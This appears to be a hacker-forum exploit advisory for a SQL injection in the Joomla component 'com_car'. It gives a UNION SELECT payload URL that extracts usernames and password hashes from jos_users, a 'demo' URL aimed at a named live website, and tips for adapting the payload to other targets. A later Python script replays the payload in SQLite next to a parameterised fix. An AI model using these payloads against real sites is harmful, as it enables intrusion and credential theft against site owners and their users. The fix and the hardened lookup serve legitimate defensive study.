###############################################################
#                                                             #
#   Joomla component 'com_car' SQL injection vulnerability    #
#                                                             #
###############################################################
#                                                             #
#   xploited by k1ll3r_null                                   #
#                                                             #
#   contact: k1ll3r.null@gmail.com                            #
#                                                             #
###############################################################

+++++++ greetz to all p0wnbox.com members !!! +++++++

--------------------------------------------------------------------------------------

Vulnerable Joomla component : com_car
Vulnerable parameter        : "edit" ($_GET)

-------------------------------------------------------------------------------------------------------------------------

Exploit :

http://www.site.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--

View demo :

http://www.pandisciautomobili.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--

--------------------------------------------------------------------------------------------------------------------------

Notes :

- The "edit" value is placed directly into the component's SQL query. -999 selects no real row, so the only row the page renders is the one supplied by the UNION SELECT.
- The payload assumes the original SELECT returns 24 columns and that the page template prints columns 13 and 18; that is why concat(username,char(58),password) is placed in those two positions (char(58) is ':'). Both the column count and the visible positions are specific to this component and must be re-established on any other target.
- jos_ is the default Joomla table prefix; an install with a custom prefix needs the table name adjusted.
- Fix: cast "edit" to an integer (or bind it as a query parameter) before it reaches the query instead of interpolating the raw $_GET value.

--------------------------------------------------------------------------------------------------------------------------
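As an added illustration, not part of the original advisory or of the com_car component, the following Python script reproduces the mechanics above against an in-memory SQLite database: the advisory's own payload is pulled out of the exploit URL the way PHP fills $_GET['edit'], fed into a lookup that interpolates it into the SQL text, and then into a hardened lookup that casts and binds it. The 24-column car table, the table and column names, the sample jos_users row with its constructed hash:salt value, and the choice of columns 13 and 18 as the ones the page prints are all assumptions made for the demo; concat() and char() are registered as user functions because SQLite does not provide MySQL's versions.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Exploit URL from the advisory; '+' decodes to spaces in the query string.
EXPLOIT_URL = ("http://www.site.com/index.php?option=com_car&edit=-999+UNION+SELECT"
               "+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,"
               "concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--")

N_COLS = 24                  # assumption: the vulnerable SELECT returns 24 columns
SHOWN_COLS = (13, 18)        # assumption: the template prints columns 13 and 18 (1-based)
ADMIN_USER = "admin"         # constructed sample row for jos_users
ADMIN_HASH = "0123456789abcdef0123456789abcdef:saltsalt"  # constructed hash:salt value


def build_db():
    """In-memory stand-in for the Joomla database (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    # The payload relies on MySQL's concat() and char(); emulate both for SQLite.
    conn.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    conn.create_function("char", -1, lambda *codes: "".join(chr(c) for c in codes))
    car_cols = ", ".join(f"c{i} TEXT" for i in range(2, N_COLS + 1))
    conn.execute(f"CREATE TABLE car (id INTEGER, {car_cols})")
    car_vals = ", ".join(f"'car{i}'" for i in range(2, N_COLS + 1))
    conn.execute(f"INSERT INTO car VALUES (1, {car_vals})")
    conn.execute("CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO jos_users VALUES (62, ?, ?)", (ADMIN_USER, ADMIN_HASH))
    conn.commit()
    return conn


def edit_param(url):
    """Extract the 'edit' GET parameter the way PHP populates $_GET['edit']."""
    return parse_qs(urlsplit(url).query)["edit"][0]


def lookup_car_vulnerable(conn, edit):
    """The flaw the advisory describes: $_GET['edit'] interpolated into the SQL text."""
    sql = f"SELECT * FROM car WHERE id = {edit}"
    return conn.execute(sql).fetchall()


def lookup_car_safe(conn, edit):
    """Hardened form: cast to int and bind as a parameter, so input never becomes SQL."""
    try:
        car_id = int(edit)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT * FROM car WHERE id = ?", (car_id,)).fetchall()


def rendered_cells(rows):
    """What the page would show: only the columns the template prints."""
    return [tuple(row[c - 1] for c in SHOWN_COLS) for row in rows]


if __name__ == "__main__":
    db = build_db()
    payload = edit_param(EXPLOIT_URL)
    print("vulnerable:", rendered_cells(lookup_car_vulnerable(db, payload)))
    print("hardened:  ", rendered_cells(lookup_car_safe(db, payload)))
```

Running it shows the vulnerable lookup returning a single row whose 13th and 18th cells hold admin:<hash>, which is exactly what the demo URL renders on a live target, while the hardened lookup rejects the payload outright and still returns the correct car row for a legitimate numeric id.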